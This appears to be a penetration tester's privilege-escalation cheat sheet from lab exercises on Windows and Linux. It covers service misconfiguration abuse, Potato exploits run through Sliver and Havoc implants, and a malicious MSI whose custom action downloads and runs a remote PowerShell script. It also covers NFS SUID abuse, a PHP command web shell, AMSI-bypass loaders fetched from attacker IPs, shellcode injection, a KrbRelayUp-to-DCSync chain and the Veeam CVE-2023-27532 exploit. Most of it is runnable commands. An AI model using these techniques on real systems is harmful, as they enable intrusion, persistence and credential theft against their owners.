Windows Services
Unquoted Service Paths
Weak Service Permission
sharpup audit
sc.exe config snmptrap start= auto
sc config "SNMPTRAP" obj= "NT AUTHORITY\SYSTEM" password= ""
sc config "SNMPTRAP" binPath= "net localgroup Administrators final\nina /add"
sc stop "SNMPTRAP"
net localgroup Administrators
sc start "SNMPTRAP"
net localgroup Administrators
Weak Service Binary Permission
UAC Bypass
Abusable Token Privileges
In Havoc Shell
dotnet inline-execute /home/jay/prolabs/cybernatics/SharpEfsPotato.exe -p demon_new.exe
In Sliver Shell
sliver (CASUAL_PLATFORM) > execute-assembly /home/jay/prolabs/cybernatics/SharpEfsPotato.exe -p CASUAL_PLATFORM.exe
You can also use PetitPotato after uploading it, dotnet inline-execute was not working for some reason.
if not possible through execute-assembly then upload both the files and execute.
execute SharpEfsPotato.exe -p CASUAL_PLATFORM.exe
Normal Shell
PetitPotato.exe 3 demon_new.exe
SE Impersonate (Method 2 God Potato)
Sharp.ps1
# PowerShell script to download and execute a script from a specified URL
$url = "http://10.8.2.41/amsi64.txt"
$scriptContent = (New-Object System.Net.WebClient).DownloadString($url)
Invoke-Expression $scriptContent
upload Godpotato.exe
./GodPotato-NET4.exe -cmd "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -noprofile -executionpolicy bypass -file c:\windows\tasks\sharp.ps1"
SE Impersonate ( Method 3 Godpotato donut)
upload sharp.ps1
./donut -i /home/jay/vulnlab/breach/GodPotato-NET4.exe -a 2 -b 2 -o /tmp/payload.bin -p '-cmd "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -noprofile -executionpolicy bypass -file c:\windows\tasks\sharp.ps1"'
execute notepad.exe
ps -e notepad
execute-shellcode -p 3604 /tmp/payload.bin
SE Impersonate (Method 3 Printspoofer, donut)
- Use the file generated from sliverphollow from above sph.exe
- copy ‘/opt/Tools/privesc-windows/PrintSpoofer64.exe’
cp /opt/Tools/privesc-windows/PrintSpoofer64.exe .
upload sph.exe
./donut -i /home/jay/osep/challenge6/resources_development/PrintSpoofer64.exe -a 2 -b 2 -o /tmp/payload.bin -p '-c c:\windows\tasks\shp.exe'
execute notepad.exe
ps -e notepad
execute-shellcode -p 3604 /tmp/payload.bin
Local System but not SE Impersonate or disabled.
https://github.com/itm4n/FullPowers
On Windows, some services executed as LOCAL SERVICE or NETWORK SERVICE are configured to run with a restricted set of privileges. Therefore, even if the service is compromised, you won’t get the golden impersonation privileges and privilege escalation to LOCAL SYSTEM should be more complicated. However, I found that, when you create a scheduled task, the new process created by the Task Scheduler Service has all the default privileges of the associated user account (except SeImpersonate). Therefore, with some token manipulations, you can spawn a new process with all the missing privileges.
upload /home/jay/tools/Fullpowers/FullPowers.exe
shell
./FullPowers.exe -c "powershell -ep bypass"
Always Install Elevated
https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/create-msi-with-wix
Bad.wix
<?xml version="1.0"?>
<Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">
<Product Id="*" UpgradeCode="12345678-1234-1234-1234-111111111111" Name="Example Product Name"
Version="0.0.1" Manufacturer="@_xpn_" Language="1033">
<Package InstallerVersion="200" Compressed="yes" Comments="Windows Installer Package"/>
<Media Id="1" Cabinet="product.cab" EmbedCab="yes"/>
<Directory Id="TARGETDIR" Name="SourceDir">
<Directory Id="ProgramFilesFolder">
<Directory Id="INSTALLLOCATION" Name="Example">
<Component Id="ApplicationFiles" Guid="12345678-1234-1234-1234-222222222222">
</Component>
</Directory>
</Directory>
</Directory>
<Feature Id="DefaultFeature" Level="1">
<ComponentRef Id="ApplicationFiles"/>
</Feature>
<CustomAction Id="SystemShell" Execute="deferred" Directory="TARGETDIR" ExeCommand="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe iex (iwr http://10.10.15.207/large1.ps1 -UseBasicParsing)" Return="ignore"
Impersonate="no"/>
<InstallExecuteSequence>
<Custom Action="SystemShell" After="InstallInitialize"></Custom>
</InstallExecuteSequence>
</Product>
</Wix> ./candle.exe bad.wix
.\light.exe .\bad.wixobj
.\signtool.exe sign /fd SHA256 /sha1 b955c43dabda2dfb367d934b5b88dad2d94bedbb C:\Users\jay\Desktop\bad.msi
msiexec /quiet /qn /i bad.msi
Linux
nfs_share
- We have shell as www-data
- We See that there is user “peter.truner@hybrid.vl” which we can’t access
- We have write access to nfs share on the machine
As we can write to the NFS share, we can write files with the userid to the share and then create a suid binary to get execute permissions as this user.
On victim machine
id peter.turner@hybrid.vl
This will give us the id of the user
www-data@mail01:/opt/share$ cp /usr/bin/bash .
On the nfs_share of the victim machine we copy the /usr/bin/bash
On attacker machine
sudo adduser nfs_user
sudo sed -i -e 's/1001/902601104/g' /etc/passwd
On our attacker machine we copy the bash to tmp, delete the bash on the share and copy it back to the share as our nfs_user, finally we set the suid id
cp bash /tmp/ (Remove now from the share)
su nfs_user
cp /tmp/bash . (Copy the bash in nfs share)
chmod +xs bash
as www-data we can call the bash with -p to get euid of peter
www-data@mail01:/opt/share$ ./bash -p
id
Now we can access the home directory of peter.
Abusing Symbolic links on Windows
Method 1 - NTFS Mount Points/ Directory Junctions
To create the directory junction the link directory need to be empty and user should have write handle to the parent directory.
- There is a php upload functionality which creates a file in a folder where attacker has write access.
- Attacker creates a syslink using the command below. when the attacker uploads the file and that folder is already there the file in that folder will be linked to the
C:\xampp\htdocs. - The user can the open the shell.php from the web browser.
mklink /J C:\Windows\Tasks\Uploads\13f8945dedd4f14dbeab83ed8f7da3f6\ C:\xampp\htdocs
<?php
system($_REQUEST['cmd']);
?>
powershell "IEX (New-Object System.Net.WebClient).DownloadString('http://10.8.2.41:80/amsi64.txt')"
Method Worked Privilege Escalation Add machine account
execute-assembly ./CheckPort.exe
**CLSIDs** (confirmed working on Server 2019/2022 with ADCS installed):
- c980e4c2-c178-4572-935d-a8a429884806
- 90f18417-f0f1-484e-9d3c-59dceee5dbd8
- 03ca98d6-ff5d-49b8-abc6-03dd84127020
- d99e6e73-fc88-11d0-b498-00a0c90312f3 (certsrv.exe)
- 42cbfaa7-a4a7-47bb-b422-bd10e9d02700
- 000c101c-0000-0000-c000-000000000046
- 1b48339c-d15e-45f3-ad55-a851cb66be6b
- 49e6370b-ab71-40ab-92f4-b009593e4518
- 50d185b9-fff3-4656-92c7-e4018da4361d
- 3c6859ce-230b-48a4-be6c-932c0c202048 (trusted installer service)
execute-assembly ./KrbRelayUp.exe "full -m rbcd -c -cls {d99e6e73-fc88-11d0-b498-00a0c90312f3} -p 10246"
impacket-getST -impersonate 'Administrator' bruno.vl/'KRBRELAYUP$':'yT6#fH1-nK2$aH7=' -spn 'cifs/BRUNODC.bruno.vl'
export KRB5CCNAME=administrator@HOST_BRUNODC@BRUNO.VL.ccache
cme smb brunodc.bruno.vl -u 'Administrator' --use-kcache -M ntdsutil
VL{b528ba689d85ca396374c0f186087a7d}
https://gist.github.com/tothi/bf6c59d6de5d0c9710f23dae5750c4b9 https://arz101.medium.com/vulnlab-bruno-f0129f60ac40 https://notes.secure77.de/?link=%2FWriteUps%2FVulnLab%2FBruno%2FWriteup
Veeam
https://github.com/sfewer-r7/CVE-2023-27532
- Had to copy all the dll mentioned form the system the serivice running on. https://www.horizon3.ai/attack-research/attack-blogs/veeam-backup-and-replication-cve-2023-27532-deep-dive/
- Changed the code to only have cmd functionality as the dll had problems for certain functions.
- You will find it in tools folder and also in the backup folder.
- Had to change the compiler arch to x64.
- on the machine running the service used following command.
- check first by executing notepad.exe
./VeeamHax.exe --target 127.0.0.1 --cmd "C:\Users\Ferdinand\Desktop\Release\Release\exe_generation.exe"